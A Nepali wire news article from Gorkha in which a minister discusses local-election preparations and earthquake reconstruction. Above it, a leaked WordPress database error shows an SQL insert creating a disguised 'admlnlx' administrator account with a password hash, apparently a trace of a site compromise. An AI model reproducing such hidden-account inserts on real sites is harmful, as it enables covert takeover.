WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTzQ4O11jlii5ppkmqaRvSsUt/Br1s.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 07:27:52', '', 'admlnlx', 'admlnlx')
गोरखा, माघ ८ –
सङ्घीय मामिला तथा स्थानीय विकास मन्त्री हितराज पाण्डेले स्थानीय तहको निर्वाचनका लागि सरकारले गृहकार्य गर्दै आएको बताउनुभएको छ ।
संविधानमा उल्लेख भएअनुसार ०७४ माघ ७ भित्र स्थानीय, प्रदेश र केन्द्रको निर्वाचन गर्नुपर्ने भन्दै उहाँले आउँदो जेठसम्म स्थानीय तहको निर्वाचनसक्ने गरी सरकार तयारीमा लागेको बताउनुभयो ।
गोरखा तान्द्राङमा आज बिहान कल्याण, राजेश सहिदस्मृति सामुदायिक भवन शिलान्यास गर्दै मन्त्री पाण्डेले ‘सहिदको सपना विकास र समृद्धि’ भएको भन्दै सहिदका सपना पूरा हुने विश्वास व्यक्त गर्नुभयो । सरकारको थुप्रै दायित्वमध्ये संविधान कार्यान्वयन, निर्वाचन र भूकम्पपछिको पुनःनिर्माण महत्वपूर्ण दायित्व रहेको उहाँको भनाइ छ ।
पुनःनिर्माणको काममा सरकार र प्रतिपक्षले सहयोगी भूमिका निर्वाह गर्नुपर्ने भन्दै उहाँले गाउँ, बस्ती पुनःनिर्माणमा सबैको सहयोग भए मात्रै भूकम्प प्रतिरोधी संरचना निर्माण हुने बताउनुभयो ।
सरकारले उपलब्ध गराएको अनुदान लिएर धमाधम घर बनाउन सुरु गर्नुपर्ने भन्दै उहाँले पुनःनिर्माणलाई गति दिनुपर्ने बताउनुभयो । अनुदान पाउनबाट छुटेका वास्तविक भूकम्पपीडितको गुनासो सम्बोधन गरी अनुदान उपलब्ध गराउने उहाँको भनाइ छ । – रासस